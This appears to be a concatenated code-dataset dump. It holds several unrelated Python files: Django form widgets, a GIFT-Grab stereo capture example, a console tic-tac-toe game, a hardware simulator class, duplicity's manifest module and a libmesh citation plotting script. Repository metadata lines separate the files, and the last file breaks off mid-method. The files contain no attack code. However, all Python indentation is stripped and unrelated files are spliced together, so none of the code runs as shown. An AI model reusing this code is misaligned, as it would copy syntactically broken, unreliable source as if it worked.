output = [start_tag]
for i, choice in enumerate(self.choices):
choice_value, choice_label = choice
if isinstance(choice_label, (tuple,list)):
attrs_plus = self.attrs.copy()
if id_:
attrs_plus['id'] += '_{0}'.format(i)
sub_ul_renderer = ChoiceFieldRenderer(name=self.name,
value=self.value,
attrs=attrs_plus,
choices=choice_label)
sub_ul_renderer.choice_input_class = self.choice_input_class
output.append(format_html('<li>{0}{1}</li>', choice_value,
sub_ul_renderer.render()))
else:
w = self.choice_input_class(self.name, self.value,
self.attrs.copy(), choice, i)
output.append(format_html('<li>{0}</li>', force_text(w)))
output.append('</ul>')
return mark_safe('\n'.join(output))
class RadioFieldRenderer(ChoiceFieldRenderer):
choice_input_class = RadioChoiceInput
class CheckboxFieldRenderer(ChoiceFieldRenderer):
choice_input_class = CheckboxChoiceInput
class RendererMixin(object):
renderer = None # subclasses must define this
_empty_value = None
def __init__(self, *args, **kwargs):
# Override the default renderer if we were passed one.
renderer = kwargs.pop('renderer', None)
if renderer:
self.renderer = renderer
super(RendererMixin, self).__init__(*args, **kwargs)
def subwidgets(self, name, value, attrs=None, choices=()):
for widget in self.get_renderer(name, value, attrs, choices):
yield widget
def get_renderer(self, name, value, attrs=None, choices=()):
"""Returns an instance of the renderer."""
if value is None:
value = self._empty_value
final_attrs = self.build_attrs(attrs)
choices = list(chain(self.choices, choices))
return self.renderer(name, value, final_attrs, choices)
def render(self, name, value, attrs=None, choices=()):
return self.get_renderer(name, value, attrs, choices).render()
def id_for_label(self, id_):
# Widgets using this RendererMixin are made of a collection of
# subwidgets, each with their own <label>, and distinct ID.
        # The IDs are made distinct by a "_X" suffix, where X is the zero-based
# index of the choice field. Thus, the label for the main widget should
# reference the first subwidget, hence the "_0" suffix.
if id_:
id_ += '_0'
return id_
class RadioSelect(RendererMixin, Select):
renderer = RadioFieldRenderer
_empty_value = ''
class CheckboxSelectMultiple(RendererMixin, SelectMultiple):
renderer = CheckboxFieldRenderer
_empty_value = []
class MultiWidget(Widget):
"""
A widget that is composed of multiple widgets.
Its render() method is different than other widgets', because it has to
figure out how to split a single value for display in multiple widgets.
The ``value`` argument can be one of two things:
* A list.
* A normal value (e.g., a string) that has been "compressed" from
a list of values.
In the second case -- i.e., if the value is NOT a list -- render() will
first "decompress" the value into a list before rendering it. It does so by
calling the decompress() method, which MultiWidget subclasses must
implement. This method takes a single "compressed" value and returns a
list.
When render() does its HTML rendering, each value in the list is rendered
with the corresponding widget -- the first value is rendered in the first
widget, the second value is rendered in the second widget, etc.
Subclasses may implement format_output(), which takes the list of rendered
widgets and returns a string of HTML that formats them any way you'd like.
You'll probably want to use this class with MultiValueField.
"""
def __init__(self, widgets, attrs=None):
self.widgets = [w() if isinstance(w, type) else w for w in widgets]
super(MultiWidget, self).__init__(attrs)
def render(self, name, value, attrs=None):
if self.is_localized:
for widget in self.widgets:
widget.is_localized = self.is_localized
# value is a list of values, each corresponding to a widget
# in self.widgets.
if not isinstance(value, list):
value = self.decompress(value)
output = []
final_attrs = self.build_attrs(attrs)
id_ = final_attrs.get('id', None)
for i, widget in enumerate(self.widgets):
try:
widget_value = value[i]
except IndexError:
widget_value = None
if id_:
final_attrs = dict(final_attrs, id='%s_%s' % (id_, i))
output.append(widget.render(name + '_%s' % i, widget_value, final_attrs))
return mark_safe(self.format_output(output))
def id_for_label(self, id_):
# See the comment for RadioSelect.id_for_label()
if id_:
id_ += '_0'
return id_
def value_from_datadict(self, data, files, name):
return [widget.value_from_datadict(data, files, name + '_%s' % i) for i, widget in enumerate(self.widgets)]
def format_output(self, rendered_widgets):
"""
Given a list of rendered widgets (as strings), returns a Unicode string
representing the HTML for the whole lot.
This hook allows you to format the HTML design of the widgets, if
needed.
"""
return ''.join(rendered_widgets)
def decompress(self, value):
"""
Returns a list of decompressed values for the given compressed value.
The given value can be assumed to be valid, but not necessarily
non-empty.
"""
raise NotImplementedError('Subclasses must implement this method.')
def _get_media(self):
"Media for a multiwidget is the combination of all media of the subwidgets"
media = Media()
for w in self.widgets:
media = media + w.media
return media
media = property(_get_media)
def __deepcopy__(self, memo):
obj = super(MultiWidget, self).__deepcopy__(memo)
obj.widgets = copy.deepcopy(self.widgets)
return obj
@property
def needs_multipart_form(self):
return any(w.needs_multipart_form for w in self.widgets)
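# Illustrative sketch (added note, not part of the original module): a typical
# MultiWidget subclass just supplies its sub-widgets and a decompress() that
# splits one compressed value into a list, mirroring SplitDateTimeWidget below.
# The class and field semantics here are hypothetical:
#
#     class HypotheticalNameWidget(MultiWidget):
#         def __init__(self, attrs=None):
#             widgets = (TextInput(attrs=attrs), TextInput(attrs=attrs))
#             super(HypotheticalNameWidget, self).__init__(widgets, attrs)
#
#         def decompress(self, value):
#             # "First Last" -> ["First", "Last"]; empty value -> [None, None]
#             return value.split(' ', 1) if value else [None, None]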
class SplitDateTimeWidget(MultiWidget):
"""
A Widget that splits datetime input into two <input type="text"> boxes.
"""
def __init__(self, attrs=None, date_format=None, time_format=None):
widgets = (DateInput(attrs=attrs, format=date_format),
TimeInput(attrs=attrs, format=time_format))
super(SplitDateTimeWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if value:
value = to_current_timezone(value)
return [value.date(), value.time().replace(microsecond=0)]
return [None, None]
class SplitHiddenDateTimeWidget(SplitDateTimeWidget):
"""
A Widget that splits datetime input into two <input type="hidden"> inputs.
"""
is_hidden = True
def __init__(self, attrs=None, date_format=None, time_format=None):
super(SplitHiddenDateTimeWidget, self).__init__(attrs, date_format, time_format)
for widget in self.widgets:
widget.input_type = 'hidden'
widget.is_hidden = True
| bsd-3-clause | -8,474,089,965,727,551,000 | 35.813137 | 130 | 0.596628 | false |
gift-surg/GIFT-Grab | src/tests/blackmagic/stereo_capture.py | 1 | 4325 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Example demonstrating how stereo video frames can be captured
using a frame grabber card that supports this feature.
"""
import time
import cv2
import numpy as np
from pygiftgrab import (IObserver, VideoSourceFactory,
ColourSpace, Device, VideoFrame)
class StereoFrameSaver(IObserver):
"""
    Simple class that demonstrates how mono and stereo frames and
    their respective parameters can be queried, and how the actual
    frame data can be saved using the GIFT-Grab stereo API.
"""
def __init__(self):
super(StereoFrameSaver, self).__init__()
self.current = 0
def update(self, frame):
self.current += 1
# 4 is the number of variations of stereo/mono
# calls to the data method, using it here as well to
# avoid flooding the user's terminal
if self.current <= 4:
# display number of stereo frames, should be 2
# for this device
print(
'Got {} stereo frames'.format(
frame.stereo_count()
)
)
# display length of data of each stereo frame,
# each stereo frame should consist of same number
# of bytes for this device
print(
'Stereo data length (bytes):\n'
'\tdata_length(): {}\n'
'\tdata_length(0): {}\n'
'\tdata_length(1): {}\n'.format(
frame.data_length(), frame.data_length(0),
frame.data_length(1)
)
)
frame_shape = (frame.rows(), frame.cols(), 4)
# the slicing below, i.e. [:, :, :3], is due to OpenCV's
# imwrite expecting BGR data, so we strip out the alpha
# channel of each frame when saving it
if self.current == 1:
# all three calls below save the same frame,
# that is the first of the two stereo frames
cv2.imwrite(
'mono-frame.data.png',
np.reshape(frame.data(), frame_shape)[:, :, :3]
)
cv2.imwrite(
'mono-frame.data-False.png',
np.reshape(frame.data(False), frame_shape)[:, :, :3]
)
cv2.imwrite(
'mono-frame.data-False-0.png',
np.reshape(frame.data(False, 0), frame_shape)[:, :, :3]
)
elif self.current == 2:
# the two calls below save the two stereo frames,
# however the data needs to be reshaped, as the
# call to the data method yields a flat NumPy array
cv2.imwrite(
'stereo-frame.data-False-0.png',
np.reshape(frame.data(False, 0), frame_shape)[:, :, :3]
)
cv2.imwrite(
'stereo-frame.data-False-1.png',
np.reshape(frame.data(False, 1), frame_shape)[:, :, :3]
)
elif self.current == 3:
# the two calls below save the two stereo frames,
# without the need for reshaping the data, as the
# call to the data method already yields a
# structured NumPy array
cv2.imwrite(
'mono-frame.data-True.png',
frame.data(True)[:, :, :3]
)
cv2.imwrite(
'mono-frame.data-True-0.png',
frame.data(True, 0)[:, :, :3]
)
elif self.current == 4:
# the two calls below save the two stereo frames,
# without the need for reshaping the data, as the
# call to the data method already yields a
# structured NumPy array
cv2.imwrite(
'stereo-frame.data-True-0.png',
frame.data(True, 0)[:, :, :3]
)
cv2.imwrite(
'stereo-frame.data-True-1.png',
frame.data(True, 1)[:, :, :3]
)
if __name__ == '__main__':
sfac = VideoSourceFactory.get_instance()
source = sfac.get_device(
Device.DeckLink4KExtreme12G, ColourSpace.BGRA
)
saver = StereoFrameSaver()
source.attach(saver)
time.sleep(2) # operate pipeline for 2 sec
source.detach(saver)
| bsd-3-clause | -5,324,610,510,568,604,000 | 32.269231 | 71 | 0.52 | false |
arcade-lab/tia-infrastructure | tools/simulator/system.py | 1 | 9352 | """
Top-level system wrapper.
"""
import re
import sys
import pandas as pd
from simulator.exception import SimulatorException
class System:
"""
A system class to wrap a collection of processing and memory elements as well as the channels through which they
communicate.
"""
def __init__(self):
"""
Empty system.
"""
# Start at the zeroth cycle, and initialize system elements as empty lists to allow for appends.
self.cycle = 0
self.processing_elements = []
self.memories = []
self.buffers = []
# Add hierarchical elements for easier access.
self.quartets = []
self.blocks = []
self.arrays = []
# --- Time-stepping Method ---
def iterate(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace):
"""
Move ahead one clock cycle, period or whatever you want to call it (this is a functional simulator).
:param interactive: waiting on the user at each cycle
:param show_processing_elements: showing processing element information
:param show_memories: showing memory element information
        :param show_buffers: showing channel information
        :param keep_execution_trace: keeping a running log of executed instructions on each processing element
        :return: whether the system has halted
"""
# Initially, assume the system is halting this cycle.
halt = True
# Print out a debug header, if requested.
if interactive or show_processing_elements or show_memories or show_buffers:
print(f"\n--- Cycle: {self.cycle} ---\n")
# Perform local processing element operations.
if show_processing_elements:
print("Processing Elements\n")
for processing_element in self.processing_elements:
processing_element.iterate(show_processing_elements, keep_execution_trace)
for processing_element in self.processing_elements:
halt &= processing_element.core.halt_register # Only halt if all processing elements have halted.
# Perform memory operations.
if show_memories:
print("Memories\n")
for memory in self.memories:
memory.iterate(show_memories)
# Commit all pending buffer transactions.
if show_buffers:
print("Buffers\n")
for buffer in self.buffers:
buffer.commit(show_buffers)
halt &= buffer.empty # Only halt the system if all buffers are empty.
# Move time forward assuming we are not halting.
if not halt:
self.cycle += 1
# Return whether we should halt.
return halt
# --- Display Methods ---
def halt_message(self):
"""
Print a message showing the state of the system upon halting.
"""
# Formatted message.
print(f"\n--- System halted after {self.cycle} cycles. ---\n")
print("Final Memory Layout\n")
for memory in self.memories:
print(f"name: {memory.name}")
print("contents:")
i = 0
while i < 10:
if i < len(memory.contents):
print(f"0x{memory.contents[i]:08x}")
else:
break
i += 1
if len(memory.contents) > 10:
print("...\n")
else:
print("bound\n")
def interrupted_message(self):
"""
Print a message showing the state of the system upon being interrupted by the user in a simulation.
:param self: system wrapper
"""
# Formatted message.
print(f"\n--- System interrupted after {self.cycle} cycles. ---\n")
print("Final Memory Layout\n")
for memory in self.memories:
print(f"name: {memory.name}")
print("contents:")
i = 0
while i < 10:
if i < len(memory.contents):
print(f"0x{memory.contents[i]:08x}")
else:
break
i += 1
if len(memory.contents) > 10:
print("...\n")
else:
print("bound\n")
# --- Top-level Methods ---
def register(self, element):
"""
Register a functional unit (processing element, memory, etc.) with the event loop.
:param element: functional unit
"""
# Make sure the functional unit has a special registration method.
registration_operation = getattr(element, "_register")
if not callable(registration_operation):
exception_string = f"The functional unit of type {type(element)} does not have internal system " \
+ f"registration method."
raise SimulatorException(exception_string)
# Call the functional unit's internal method.
element._register(self)
def finalize(self):
"""
Alphabetize components in the event loop for clean debug output and make sure all processing elements are
indexed.
"""
# The numerical strings are the ones we care about.
def natural_number_sort_key(entity):
name = entity.name
key_string_list = re.findall(r"(\d+)", name)
if len(key_string_list) > 0:
return [int(key_string) for key_string in key_string_list]
else:
return []
# Sort all the entities.
self.processing_elements = sorted(self.processing_elements, key=natural_number_sort_key)
for i, processing_element in enumerate(self.processing_elements):
if processing_element.name != f"processing_element_{i}":
exception_string = f"Missing processing element {i}."
raise SimulatorException(exception_string)
self.memories = sorted(self.memories, key=natural_number_sort_key)
self.buffers = sorted(self.buffers, key=natural_number_sort_key)
def run(self, interactive, show_processing_elements, show_memories, show_buffers, keep_execution_trace):
"""
Execute until the system halts or a user issues an interrupt or writes an EOF.
:param interactive: whether to wait for user input on each cycle
:param show_processing_elements: whether to show processing element status each cycle
:param show_memories: whether to show a summary of the memory contents each cycle
:param show_buffers: whether to show channel state each cycle
:param keep_execution_trace: whether to keep a running log of executed instructions on each processing element
:return: whether the system has halted and whether it was interrupted
"""
# Simple event/read-evaluate loop.
halt = False
interrupted = False
while True:
try:
if interactive:
if self.cycle > 0:
user_input = input("Press [Enter] to continue. Type \"exit\", or use [Ctrl-C] o [Ctrl-D] to "
+ "exit.\n").strip()
if user_input == "exit":
break
elif user_input != "":
print(f"Unrecognized command: {user_input}.", file=sys.stderr)
halt = self.iterate(interactive,
show_processing_elements,
show_memories,
show_buffers,
keep_execution_trace)
if halt:
self.halt_message()
break
except (KeyboardInterrupt, EOFError):
interrupted = True
self.interrupted_message()
break
# Return the status flags.
return halt, interrupted
def reset_processing_elements(self):
"""
Reset all the processing elements in a system.
"""
# Use the reset() methods built in to the processing elements.
for processing_element in self.processing_elements:
processing_element.reset()
def reset_memories(self):
"""
Reset all the memories in a system.
"""
# Use the reset() methods built in to the memories.
for memory in self.memories:
memory.reset()
def reset_buffers(self):
"""
Reset all the buffers in a system.
"""
# Use the buffers' own reset() methods.
for buffer in self.buffers:
buffer.reset()
def reset(self):
"""
Reset all the processing elements, memories and buffers.
"""
# Just wrap our own methods.
self.reset_processing_elements()
self.reset_memories()
self.reset_buffers()
@property
def processing_element_traces(self):
# Return a dictionary of execution traces.
return {processing_element.name: processing_element.core.execution_trace
for processing_element in self.processing_elements}
@property
def processing_element_traces_as_data_frame(self):
# For convenient CSV output and analysis.
return pd.DataFrame(self.processing_element_traces)
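# A minimal usage sketch (the element objects are hypothetical; each must
# implement a _register() method, as checked by register() above):
#
#     system = System()
#     for element in processing_elements + memories + buffers:
#         system.register(element)
#     system.finalize()  # sort elements and verify processing element indexing
#     halt, interrupted = system.run(interactive=False,
#                                    show_processing_elements=False,
#                                    show_memories=False,
#                                    show_buffers=False,
#                                    keep_execution_trace=True)
#     if halt:
#         traces = system.processing_element_traces_as_data_frame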
| mit | 3,835,425,596,161,252,000 | 34.558935 | 118 | 0.572391 | false |
Mariaanisimova/pythonintask | IVTp/2014/Shcherbakov_R_A/task_12_22.py | 1 | 1719 | # Task 12. Variant 22.
# Develop a "Tic-tac-toe" game. (See M. Dawson, Programming in Python,
# ch. 6).
# Shcherbakov R.A.
# 22.05.2016
print("""
Welcome to the tic-tac-toe game
To make a move, enter a number from 0 to 8
0 | 1 | 2
---------
3 | 4 | 5
---------
6 | 7 | 8""")
doska=["-","-","-","-","-","-","-","-","-"]
bol=True
wins=False
schet=0
def disp(doska):
print("\n\t"+doska[0]+" | "+doska[1]+" | "+doska[2]+"\n\t---------"+
"\n\t"+doska[3]+" | "+doska[4]+" | "+doska[5]+"\n\t---------"+
"\n\t"+doska[6]+" | "+doska[7]+" | "+doska[8]+"\n\t---------")
def win(doska):
twin=((0,1,2),(3,4,5),(6,7,8),(0,3,6),(1,4,7),(2,5,8),(0,4,8),(2,4,6))
for row in twin:
if doska[row[0]]==doska[row[1]]==doska[row[2]]!="-":
return True
while wins!=True:
if(schet==5):
break
if(bol):
		n1=input("\nPlayer 1's move: ")
if(doska[int(n1)]=="-"):
doska[int(n1)]="X"
disp(doska)
bol=False
wins=win(doska)
schet+=1
else:
print("Занято")
else:
n2=input("\nХод игрока 2: ")
if(doska[int(n2)]=="-"):
doska[int(n2)]="O"
disp(doska)
bol=True
wins=win(doska)
else:
print("Занято")
if(wins and bol):
print("Победил игрок 2")
elif(wins and not bol):
print("Победил игрок 1")
else:
print("Ничья")
input("Ok") | apache-2.0 | 7,851,925,064,230,096,000 | 25.137931 | 76 | 0.446205 | false |
muff1nman/duplicity | duplicity/manifest.py | 1 | 16791 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright 2002 Ben Escoto <[email protected]>
# Copyright 2007 Kenneth Loafman <[email protected]>
#
# This file is part of duplicity.
#
# Duplicity is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# Duplicity is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with duplicity; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""Create and edit manifest for session contents"""
from future_builtins import filter
import re
from duplicity import log
from duplicity import globals
from duplicity import util
class ManifestError(Exception):
"""
Exception raised when problem with manifest
"""
pass
class Manifest:
"""
List of volumes and information about each one
"""
def __init__(self, fh=None):
"""
Create blank Manifest
@param fh: fileobj for manifest
@type fh: DupPath
@rtype: Manifest
@return: manifest
"""
self.hostname = None
self.local_dirname = None
self.volume_info_dict = {} # dictionary vol numbers -> vol infos
self.fh = fh
self.files_changed = []
def set_dirinfo(self):
"""
Set information about directory from globals,
and write to manifest file.
@rtype: Manifest
@return: manifest
"""
self.hostname = globals.hostname
self.local_dirname = globals.local_path.name # @UndefinedVariable
if self.fh:
if self.hostname:
self.fh.write("Hostname %s\n" % self.hostname)
if self.local_dirname:
self.fh.write("Localdir %s\n" % Quote(self.local_dirname))
return self
def check_dirinfo(self):
"""
Return None if dirinfo is the same, otherwise error message
Does not raise an error message if hostname or local_dirname
are not available.
@rtype: string
@return: None or error message
"""
if globals.allow_source_mismatch:
return
if self.hostname and self.hostname != globals.hostname:
errmsg = _("Fatal Error: Backup source host has changed.\n"
"Current hostname: %s\n"
"Previous hostname: %s") % (globals.hostname, self.hostname)
code = log.ErrorCode.hostname_mismatch
code_extra = "%s %s" % (util.escape(globals.hostname), util.escape(self.hostname))
elif (self.local_dirname and self.local_dirname != globals.local_path.name): # @UndefinedVariable
errmsg = _("Fatal Error: Backup source directory has changed.\n"
"Current directory: %s\n"
"Previous directory: %s") % (globals.local_path.name, self.local_dirname) # @UndefinedVariable
code = log.ErrorCode.source_dir_mismatch
code_extra = "%s %s" % (util.escape(globals.local_path.name), util.escape(self.local_dirname)) # @UndefinedVariable
else:
return
log.FatalError(errmsg + "\n\n" +
_("Aborting because you may have accidentally tried to "
"backup two different data sets to the same remote "
"location, or using the same archive directory. If "
"this is not a mistake, use the "
"--allow-source-mismatch switch to avoid seeing this "
"message"), code, code_extra)
def set_files_changed_info(self, files_changed):
if files_changed:
self.files_changed = files_changed
if self.fh:
self.fh.write("Filelist %d\n" % len(self.files_changed))
for fileinfo in self.files_changed:
self.fh.write(" %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0])))
def add_volume_info(self, vi):
"""
Add volume info vi to manifest and write to manifest
@param vi: volume info to add
@type vi: VolumeInfo
@return: void
"""
vol_num = vi.volume_number
self.volume_info_dict[vol_num] = vi
if self.fh:
self.fh.write(vi.to_string() + "\n")
def del_volume_info(self, vol_num):
"""
Remove volume vol_num from the manifest
@param vol_num: volume number to delete
@type vi: int
@return: void
"""
try:
del self.volume_info_dict[vol_num]
except Exception:
raise ManifestError("Volume %d not present in manifest" % (vol_num,))
def to_string(self):
"""
Return string version of self (just concatenate vi strings)
@rtype: string
@return: self in string form
"""
result = ""
if self.hostname:
result += "Hostname %s\n" % self.hostname
if self.local_dirname:
result += "Localdir %s\n" % Quote(self.local_dirname)
result += "Filelist %d\n" % len(self.files_changed)
for fileinfo in self.files_changed:
result += " %-7s %s\n" % (fileinfo[1], Quote(fileinfo[0]))
vol_num_list = self.volume_info_dict.keys()
vol_num_list.sort()
def vol_num_to_string(vol_num):
return self.volume_info_dict[vol_num].to_string()
result = "%s%s\n" % (result,
"\n".join(map(vol_num_to_string, vol_num_list)))
return result
__str__ = to_string
def from_string(self, s):
"""
Initialize self from string s, return self
"""
def get_field(fieldname):
"""
Return the value of a field by parsing s, or None if no field
"""
m = re.search("(^|\\n)%s\\s(.*?)\n" % fieldname, s, re.I)
if not m:
return None
else:
return Unquote(m.group(2))
self.hostname = get_field("hostname")
self.local_dirname = get_field("localdir")
# Get file changed list
filelist_regexp = re.compile("(^|\\n)filelist\\s([0-9]+)\\n(.*?)(\\nvolume\\s|$)", re.I | re.S)
match = filelist_regexp.search(s)
filecount = 0
if match:
filecount = int(match.group(2))
if filecount > 0:
def parse_fileinfo(line):
fileinfo = line.strip().split()
return (fileinfo[0], ''.join(fileinfo[1:]))
self.files_changed = list(map(parse_fileinfo, match.group(3).split('\n')))
assert filecount == len(self.files_changed)
next_vi_string_regexp = re.compile("(^|\\n)(volume\\s.*?)"
"(\\nvolume\\s|$)", re.I | re.S)
starting_s_index = 0
highest_vol = 0
latest_vol = 0
while 1:
match = next_vi_string_regexp.search(s[starting_s_index:])
if not match:
break
vi = VolumeInfo().from_string(match.group(2))
self.add_volume_info(vi)
highest_vol = max(highest_vol, vi.volume_number)
latest_vol = vi.volume_number
starting_s_index += match.end(2)
# If we restarted after losing some remote volumes, the highest volume
# seen may be higher than the last volume recorded. That is, the
# manifest could contain "vol1, vol2, vol3, vol2." If so, we don't
# want to keep vol3's info.
for i in range(latest_vol + 1, highest_vol + 1):
self.del_volume_info(i)
return self
def get_files_changed(self):
return self.files_changed
def __eq__(self, other):
"""
Two manifests are equal if they contain the same volume infos
"""
vi_list1 = self.volume_info_dict.keys()
vi_list1.sort()
vi_list2 = other.volume_info_dict.keys()
vi_list2.sort()
if vi_list1 != vi_list2:
log.Notice(_("Manifests not equal because different volume numbers"))
return False
for i in range(len(vi_list1)):
if not vi_list1[i] == vi_list2[i]:
log.Notice(_("Manifests not equal because volume lists differ"))
return False
if (self.hostname != other.hostname or
self.local_dirname != other.local_dirname):
log.Notice(_("Manifests not equal because hosts or directories differ"))
return False
return True
def __ne__(self, other):
"""
Defines !=. Not doing this always leads to annoying bugs...
"""
return not self.__eq__(other)
def write_to_path(self, path):
"""
Write string version of manifest to given path
"""
assert not path.exists()
fout = path.open("wb")
fout.write(self.to_string())
assert not fout.close()
path.setdata()
def get_containing_volumes(self, index_prefix):
"""
Return list of volume numbers that may contain index_prefix
"""
return filter(lambda vol_num:
self.volume_info_dict[vol_num].contains(index_prefix),
self.volume_info_dict.keys())
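# Illustrative sketch of the plain-text layout produced by to_string() above
# (hostname, paths and the hash value are made up; the exact column widths come
# from the format strings in this class and in VolumeInfo.to_string()):
#
#     Hostname examplehost
#     Localdir /home/user/data
#     Filelist 2
#         new     some/file
#         changed other/file
#     Volume 1:
#         StartingPath .
#         EndingPath some/file 5
#         Hash SHA1 0123456789abcdef0123456789abcdef01234567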
class VolumeInfoError(Exception):
"""
Raised when there is a problem initializing a VolumeInfo from string
"""
pass
class VolumeInfo:
"""
Information about a single volume
"""
def __init__(self):
"""VolumeInfo initializer"""
self.volume_number = None
self.start_index = None
self.start_block = None
self.end_index = None
self.end_block = None
self.hashes = {}
def set_info(self, vol_number,
start_index, start_block,
end_index, end_block):
"""
Set essential VolumeInfo information, return self
Call with starting and ending paths stored in the volume. If
a multivol diff gets split between volumes, count it as being
part of both volumes.
"""
self.volume_number = vol_number
self.start_index = start_index
self.start_block = start_block
self.end_index = end_index
self.end_block = end_block
return self
def set_hash(self, hash_name, data):
"""
Set the value of hash hash_name (e.g. "MD5") to data
"""
self.hashes[hash_name] = data
def get_best_hash(self):
"""
Return pair (hash_type, hash_data)
SHA1 is the best hash, and MD5 is the second best hash. None
is returned if no hash is available.
"""
if not self.hashes:
return None
try:
return ("SHA1", self.hashes['SHA1'])
except KeyError:
pass
try:
return ("MD5", self.hashes['MD5'])
except KeyError:
pass
return self.hashes.items()[0]
def to_string(self):
"""
Return nicely formatted string reporting all information
"""
def index_to_string(index):
"""Return printable version of index without any whitespace"""
if index:
s = "/".join(index)
return Quote(s)
else:
return "."
slist = ["Volume %d:" % self.volume_number]
whitespace = " "
slist.append("%sStartingPath %s %s" %
(whitespace, index_to_string(self.start_index), (self.start_block or " ")))
slist.append("%sEndingPath %s %s" %
(whitespace, index_to_string(self.end_index), (self.end_block or " ")))
for key in self.hashes:
slist.append("%sHash %s %s" %
(whitespace, key, self.hashes[key]))
return "\n".join(slist)
__str__ = to_string
def from_string(self, s):
"""
Initialize self from string s as created by to_string
"""
def string_to_index(s):
"""
Return tuple index from string
"""
s = Unquote(s)
if s == ".":
return ()
return tuple(s.split("/"))
linelist = s.strip().split("\n")
# Set volume number
m = re.search("^Volume ([0-9]+):", linelist[0], re.I)
if not m:
raise VolumeInfoError("Bad first line '%s'" % (linelist[0],))
self.volume_number = int(m.group(1))
# Set other fields
for line in linelist[1:]:
if not line:
continue
line_split = line.strip().split()
field_name = line_split[0].lower()
other_fields = line_split[1:]
if field_name == "Volume":
log.Warn(_("Warning, found extra Volume identifier"))
break
elif field_name == "startingpath":
self.start_index = string_to_index(other_fields[0])
if len(other_fields) > 1:
self.start_block = int(other_fields[1])
else:
self.start_block = None
elif field_name == "endingpath":
self.end_index = string_to_index(other_fields[0])
if len(other_fields) > 1:
self.end_block = int(other_fields[1])
else:
self.end_block = None
elif field_name == "hash":
self.set_hash(other_fields[0], other_fields[1])
if self.start_index is None or self.end_index is None:
raise VolumeInfoError("Start or end index not set")
return self
def __eq__(self, other):
"""
Used in test suite
"""
if not isinstance(other, VolumeInfo):
log.Notice(_("Other is not VolumeInfo"))
return None
if self.volume_number != other.volume_number:
log.Notice(_("Volume numbers don't match"))
return None
if self.start_index != other.start_index:
log.Notice(_("start_indicies don't match"))
return None
if self.end_index != other.end_index:
log.Notice(_("end_index don't match"))
return None
hash_list1 = self.hashes.items()
hash_list1.sort()
hash_list2 = other.hashes.items()
hash_list2.sort()
if hash_list1 != hash_list2:
log.Notice(_("Hashes don't match"))
return None
return 1
def __ne__(self, other):
"""
Defines !=
"""
return not self.__eq__(other)
def contains(self, index_prefix, recursive=1):
"""
Return true if volume might contain index
If recursive is true, then return true if any index starting
with index_prefix could be contained. Otherwise, just check
if index_prefix itself is between starting and ending
        indices.
"""
if recursive:
return (self.start_index[:len(index_prefix)] <=
index_prefix <= self.end_index)
else:
return self.start_index <= index_prefix <= self.end_index
nonnormal_char_re = re.compile("(\\s|[\\\\\"'])")
def Quote(s):
"""
Return quoted version of s safe to put in a manifest or volume info
"""
if not nonnormal_char_re.search(s):
return s # no quoting necessary
slist = []
for char in s:
if nonnormal_char_re.search(char):
slist.append("\\x%02x" % ord(char))
else:
slist.append(char)
return '"%s"' % "".join(slist)
def Unquote(quoted_string):
"""
Return original string from quoted_string produced by above
"""
if not quoted_string[0] == '"' or quoted_string[0] == "'":
return quoted_string
assert quoted_string[0] == quoted_string[-1]
return_list = []
i = 1 # skip initial char
while i < len(quoted_string) - 1:
char = quoted_string[i]
if char == "\\":
# quoted section
assert quoted_string[i + 1] == "x"
return_list.append(chr(int(quoted_string[i + 2:i + 4], 16)))
i += 4
else:
return_list.append(char)
i += 1
return "".join(return_list)
| gpl-2.0 | -1,987,972,922,932,362,800 | 32.183794 | 128 | 0.546602 | false |
karpeev/libmesh | doc/statistics/libmesh_citations.py | 1 | 2340 | #!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
# Number of "papers using libmesh" by year.
#
# Note 1: this does not count citations "only," the authors must have actually
# used libmesh in part of their work. Therefore, these counts do not include
# things like Wolfgang citing us in his papers to show how Deal.II is
# superior...
#
# Note 2: I typically update this data after regenerating the web page,
# since bibtex2html renumbers the references starting from "1" each year.
#
# Note 3: These citations include anything that is not a dissertation/thesis.
# So, some are conference papers, some are journal articles, etc.
#
# Note 4: The libmesh paper came out in 2006, but there are some citations
# prior to that date, obviously. These counts include citations of the
# website libmesh.sf.net as well...
#
# Note 5: Preprints are listed as the "current year + 1" and are constantly
# being moved to their respective years after being published.
data = [
'2004', 5,
'\'05', 2,
'\'06', 13,
'\'07', 8,
'\'08', 23,
'\'09', 30,
'\'10', 24,
'\'11', 37,
'\'12', 50,
'\'13', 78,
'\'14', 62,
'\'15', 24,
'P', 5, # Preprints
'T', 38 # Theses
]
# Extract the x-axis labels from the data array
xlabels = data[0::2]
# Extract the publication counts from the data array
n_papers = data[1::2]
# The number of data points
N = len(xlabels)
# Get a reference to the figure
fig = plt.figure()
# 111 is equivalent to Matlab's subplot(1,1,1) command
ax = fig.add_subplot(111)
# Create an x-axis for plotting
x = np.linspace(1, N, N)
# Width of the bars
width = 0.8
# Make the bar chart. Plot years in blue, preprints and theses in green.
ax.bar(x[0:N-2], n_papers[0:N-2], width, color='b')
ax.bar(x[N-2:N], n_papers[N-2:N], width, color='g')
# Label the x-axis
plt.xlabel('P=Preprints, T=Theses')
# Set up the xtick locations and labels. Note that you have to offset
# the position of the ticks by width/2, where width is the width of
# the bars.
ax.set_xticks(np.linspace(1,N,N) + width/2)
ax.set_xticklabels(xlabels)
# Create a title string
title_string = 'LibMesh Citations, (' + str(sum(n_papers)) + ' Total)'
fig.suptitle(title_string)
# Save as PDF
plt.savefig('libmesh_citations.pdf')
# Local Variables:
# python-indent: 2
# End:
| lgpl-2.1 | -5,032,296,851,778,894,000 | 26.529412 | 78 | 0.674359 | false |
meisterluk/print-nonascii.py | printnonascii/char.py | 1 | 2308 | #!/usr/bin/env python3
class Character:
def __init__(self, c):
self.character = c
self.unicode_point = None
self.lineno = None
self.colno = None
self.category = None
self.description = None
self.line = None
def asciionly(self):
assert self.description or self.unicode_point
if self.description is not None and self.unicode_point is not None:
out = '{} {}'.format(self.unicode_point, self.description)
